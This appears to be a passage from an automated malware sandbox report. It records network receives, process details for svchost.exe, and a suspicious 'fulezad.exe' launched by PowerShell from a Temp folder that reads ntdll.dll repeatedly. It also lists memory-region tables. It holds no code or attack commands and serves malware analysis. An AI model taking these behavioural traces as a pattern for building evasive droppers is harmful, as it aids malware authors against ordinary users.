| Receive | flags = NO_FLAG_SET, size = 12302, size_out = 12302 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 9593 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 6823, size_out = 3472 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3351, size_out = 3351 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 16416 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 4491 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 11925, size_out = 8760 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 3165, size_out = 3165 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 14350 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 2066, size_out = 2066 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 16416 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 7788 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 8628, size_out = 5840 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 2788, size_out = 1460 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1328, size_out = 1328 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 16416 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 2686 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 13730, size_out = 4380 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 9350, size_out = 9350 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 11085 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5331, size_out = 5331 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 16416 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 11823 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4593, size_out = 4593 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 16416 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 8181 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 8235, size_out = 8235 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 16416, size_out = 1980 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 14436, size_out = 14436 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 5, size_out = 5 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 4976, size_out = 4539 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 437, size_out = 437 |
|
1 | |
| Close | type = SOCK_STREAM |
|
1 |
Process #3: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k netsvcs |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:07, Reason: RPC Server |
| Unmonitor | End Time: 00:04:37, Reason: Terminated by Timeout |
| Monitor Duration | 00:03:30 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x368 |
| Parent PID | 0x1d4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
B24
0x
B20
0x
B1C
0x
B18
0x
B14
0x
B10
0x
B0C
0x
B08
0x
B04
0x
B00
0x
AFC
0x
AF8
0x
554
0x
568
0x
420
0x
7E4
0x
7DC
0x
7D8
0x
784
0x
75C
0x
748
0x
744
0x
738
0x
71C
0x
700
0x
6FC
0x
6F4
0x
6A8
0x
4C4
0x
488
0x
47C
0x
478
0x
458
0x
444
0x
30C
0x
294
0x
1E0
0x
3F8
0x
3EC
0x
3E0
0x
388
0x
384
0x
380
0x
37C
0x
374
0x
36C
0x
B94
0x
B98
0x
268
0x
838
0x
848
0x
858
0x
868
0x
878
0x
888
0x
3BC
0x
3AC
0x
6F8
0x
7A4
0x
4F4
0x
7C4
0x
244
0x
8D0
0x
8E0
0x
B0C
0x
7A0
0x
7AC
0x
B9C
0x
BB4
0x
BD8
0x
4E0
0x
AC8
0x
6FC
0x
250
0x
B40
0x
448
0x
5B0
0x
B84
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00150000 | 0x001b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x00250fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x00260fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00270fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0038ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000390000 | 0x00390000 | 0x00517fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000520000 | 0x00520000 | 0x006a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x0076ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x00b62fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b70000 | 0x00b70000 | 0x00b70fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b80000 | 0x00b80000 | 0x00b80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000b90000 | 0x00b90000 | 0x00b90fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ba0000 | 0x00ba0000 | 0x00ba1fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x00bb0000 | 0x00bb3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000bc0000 | 0x00bc0000 | 0x00bc1fff | Pagefile Backed Memory | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x00bd0000 | 0x00bfffff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x00c00000 | 0x00c03fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000c10000 | 0x00c10000 | 0x00c8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c90000 | 0x00c90000 | 0x00c90fff | Pagefile Backed Memory | rw |
|
|
|
- |
| firewallapi.dll.mui | 0x00ca0000 | 0x00cbbfff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000000cc0000 | 0x00cc0000 | 0x00cc0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000cd0000 | 0x00cd0000 | 0x00cd0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ce0000 | 0x00ce0000 | 0x00d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d60000 | 0x00d60000 | 0x00ddffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000de0000 | 0x00de0000 | 0x00e5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e60000 | 0x00e60000 | 0x00edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ef0000 | 0x00ef0000 | 0x00f6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f80000 | 0x00f80000 | 0x00ffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001000000 | 0x01000000 | 0x0107ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01080000 | 0x0134efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001360000 | 0x01360000 | 0x013dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000013f0000 | 0x013f0000 | 0x0146ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001480000 | 0x01480000 | 0x0148ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000014a0000 | 0x014a0000 | 0x0151ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001540000 | 0x01540000 | 0x015bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000015f0000 | 0x015f0000 | 0x0166ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001680000 | 0x01680000 | 0x016fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001750000 | 0x01750000 | 0x017cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001800000 | 0x01800000 | 0x0187ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000018b0000 | 0x018b0000 | 0x0192ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001980000 | 0x01980000 | 0x019fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001a20000 | 0x01a20000 | 0x01a9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001aa0000 | 0x01aa0000 | 0x01b9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ba0000 | 0x01ba0000 | 0x01c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001c30000 | 0x01c30000 | 0x01caffff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01cb0000 | 0x01d15fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001d80000 | 0x01d80000 | 0x01dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e70000 | 0x01e70000 | 0x01e7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001e80000 | 0x01e80000 | 0x021c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000021d0000 | 0x021d0000 | 0x022cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000022d0000 | 0x022d0000 | 0x0234ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002380000 | 0x02380000 | 0x023fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002400000 | 0x02400000 | 0x0247ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000024a0000 | 0x024a0000 | 0x0251ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002550000 | 0x02550000 | 0x0255ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025a0000 | 0x025a0000 | 0x0261ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002620000 | 0x02620000 | 0x0271ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002720000 | 0x02720000 | 0x0279ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002830000 | 0x02830000 | 0x028affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002910000 | 0x02910000 | 0x0298ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029f0000 | 0x029f0000 | 0x02a6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b20000 | 0x02b20000 | 0x02b9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bb0000 | 0x02bb0000 | 0x02bbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002be0000 | 0x02be0000 | 0x02c5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c60000 | 0x02c60000 | 0x02d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d60000 | 0x02d60000 | 0x02ddffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002e60000 | 0x02e60000 | 0x02f5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002fe0000 | 0x02fe0000 | 0x0305ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003140000 | 0x03140000 | 0x031bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000031c0000 | 0x031c0000 | 0x0323ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003260000 | 0x03260000 | 0x032dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003360000 | 0x03360000 | 0x0345ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000034a0000 | 0x034a0000 | 0x0351ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003540000 | 0x03540000 | 0x035bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000035d0000 | 0x035d0000 | 0x0364ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000036b0000 | 0x036b0000 | 0x0372ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003750000 | 0x03750000 | 0x037cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003800000 | 0x03800000 | 0x0387ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000038c0000 | 0x038c0000 | 0x0393ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003940000 | 0x03940000 | 0x03b3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003b90000 | 0x03b90000 | 0x03c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003ca0000 | 0x03ca0000 | 0x03d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003d80000 | 0x03d80000 | 0x03dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003e60000 | 0x03e60000 | 0x03edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003f60000 | 0x03f60000 | 0x03fdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004070000 | 0x04070000 | 0x040effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000040f0000 | 0x040f0000 | 0x0416ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000041e0000 | 0x041e0000 | 0x0425ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000042d0000 | 0x042d0000 | 0x0434ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004350000 | 0x04350000 | 0x0444ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044c0000 | 0x044c0000 | 0x0453ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004540000 | 0x04540000 | 0x045bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045c0000 | 0x045c0000 | 0x047bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004830000 | 0x04830000 | 0x048affff | Private Memory | rw |
|
|
|
- |
| kernel32.dll | 0x773c0000 | 0x774defff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x774e0000 | 0x775d9fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| svchost.exe | 0xffaa0000 | 0xffaaafff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x7fef5270000 | 0x7fef527bfff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x7fef53d0000 | 0x7fef53d7fff | Memory Mapped File | rwx |
|
|
|
- |
| tcpipcfg.dll | 0x7fef53e0000 | 0x7fef5421fff | Memory Mapped File | rwx |
|
|
|
- |
| mprapi.dll | 0x7fef5430000 | 0x7fef5469fff | Memory Mapped File | rwx |
|
|
|
- |
| rascfg.dll | 0x7fef5470000 | 0x7fef5489fff | Memory Mapped File | rwx |
|
|
|
- |
| ndiscapcfg.dll | 0x7fef5490000 | 0x7fef549efff | Memory Mapped File | rwx |
|
|
|
- |
| hnetcfg.dll | 0x7fef54a0000 | 0x7fef550afff | Memory Mapped File | rwx |
|
|
|
- |
| resutils.dll | 0x7fef5510000 | 0x7fef5528fff | Memory Mapped File | rwx |
|
|
|
- |
| clusapi.dll | 0x7fef5530000 | 0x7fef557ffff | Memory Mapped File | rwx |
|
|
|
- |
| wbemess.dll | 0x7fef55b0000 | 0x7fef562dfff | Memory Mapped File | rwx |
|
|
|
- |
| ncobjapi.dll | 0x7fef5630000 | 0x7fef5645fff | Memory Mapped File | rwx |
|
|
|
- |
| wmiprvsd.dll | 0x7fef5650000 | 0x7fef570bfff | Memory Mapped File | rwx |
|
|
|
- |
| repdrvfs.dll | 0x7fef5710000 | 0x7fef5782fff | Memory Mapped File | rwx |
|
|
|
- |
| wmiutils.dll | 0x7fef5790000 | 0x7fef57b5fff | Memory Mapped File | rwx |
|
|
|
- |
| nci.dll | 0x7fef57c0000 | 0x7fef57d9fff | Memory Mapped File | rwx |
|
|
|
- |
| netcfgx.dll | 0x7fef57e0000 | 0x7fef5863fff | Memory Mapped File | rwx |
|
|
|
- |
| browser.dll | 0x7fef5870000 | 0x7fef5894fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemcore.dll | 0x7fef58a0000 | 0x7fef59cefff | Memory Mapped File | rwx |
|
|
|
- |
| wdscore.dll | 0x7fef59d0000 | 0x7fef5a16fff | Memory Mapped File | rwx |
|
|
|
- |
| sqmapi.dll | 0x7fef5a20000 | 0x7fef5a61fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpsvc.dll | 0x7fef5a70000 | 0x7fef5b01fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemcomn.dll | 0x7fef5e10000 | 0x7fef5e95fff | Memory Mapped File | rwx |
|
|
|
- |
| wmisvc.dll | 0x7fef5ea0000 | 0x7fef5edffff | Memory Mapped File | rwx |
|
|
|
- |
| tschannel.dll | 0x7fef60c0000 | 0x7fef60c8fff | Memory Mapped File | rwx |
|
|
|
- |
| vsstrace.dll | 0x7fef65d0000 | 0x7fef65e6fff | Memory Mapped File | rwx |
|
|
|
- |
| vssapi.dll | 0x7fef65f0000 | 0x7fef679ffff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x7fef67d0000 | 0x7fef6843fff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7fef8830000 | 0x7fef891dfff | Memory Mapped File | rwx |
|
|
|
- |
| taskcomp.dll | 0x7fef8df0000 | 0x7fef8e66fff | Memory Mapped File | rwx |
|
|
|
- |
| ktmw32.dll | 0x7fefa810000 | 0x7fefa819fff | Memory Mapped File | rwx |
|
|
|
- |
| schedsvc.dll | 0x7fefa820000 | 0x7fefa931fff | Memory Mapped File | rwx |
|
|
|
- |
| wiarpc.dll | 0x7fefac60000 | 0x7fefac6efff | Memory Mapped File | rwx |
|
|
|
- |
| fvecerts.dll | 0x7fefac70000 | 0x7fefac78fff | Memory Mapped File | rwx |
|
|
|
- |
| tbs.dll | 0x7fefac80000 | 0x7fefac88fff | Memory Mapped File | rwx |
|
|
|
- |
| fveapi.dll | 0x7fefac90000 | 0x7feface5fff | Memory Mapped File | rwx |
|
|
|
- |
| shsvcs.dll | 0x7fefacf0000 | 0x7fefad4dfff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x7fefad50000 | 0x7fefad67fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x7fefad70000 | 0x7fefad80fff | Memory Mapped File | rwx |
|
|
|
- |
| ncprov.dll | 0x7fefae50000 | 0x7fefae65fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x7fefae80000 | 0x7fefaed2fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7fefaff0000 | 0x7fefaffafff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 227 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #4: fulezad.exe
290
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\users\aetadzjz\appdata\local\temp\fulezad.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:24, Reason: Child Process |
| Unmonitor | End Time: 00:01:43, Reason: Self Terminated |
| Monitor Duration | 00:00:19 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8e4 |
| Parent PID | 0xac8 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
8E8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x001b0000 | 0x00216fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x00220fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x00230fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x00241fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x00314fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x00348fff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x0037afff | Pagefile Backed Memory | rwx |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| fulezad.exe | 0x00400000 | 0x00479fff | Memory Mapped File | rwx |
|
|
|
|
| private_0x0000000000520000 | 0x00520000 | 0x0061ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000620000 | 0x00620000 | 0x007a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007b0000 | 0x007b0000 | 0x00930fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000940000 | 0x00940000 | 0x01d3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001d40000 | 0x01d40000 | 0x01e7bfff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e80000 | 0x01e80000 | 0x01ffffff | Private Memory | rw |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752b0000 | 0x752b7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (21)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\SysWOW64\ntdll.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 | |
| Create | C:\Windows\SysWOW64\ntdll.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
4 | |
| Get Info | C:\Windows\SysWOW64\ntdll.dll | type = size |
|
3 | |
| Get Info | C:\Windows\SysWOW64\ntdll.dll | type = size |
|
4 | |
| Read | C:\Windows\SysWOW64\ntdll.dll | size = 1292096, size_out = 1292096 |
|
3 | |
| Read | C:\Windows\SysWOW64\ntdll.dll | size = 1292096, size_out = 1292096 |
|
4 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
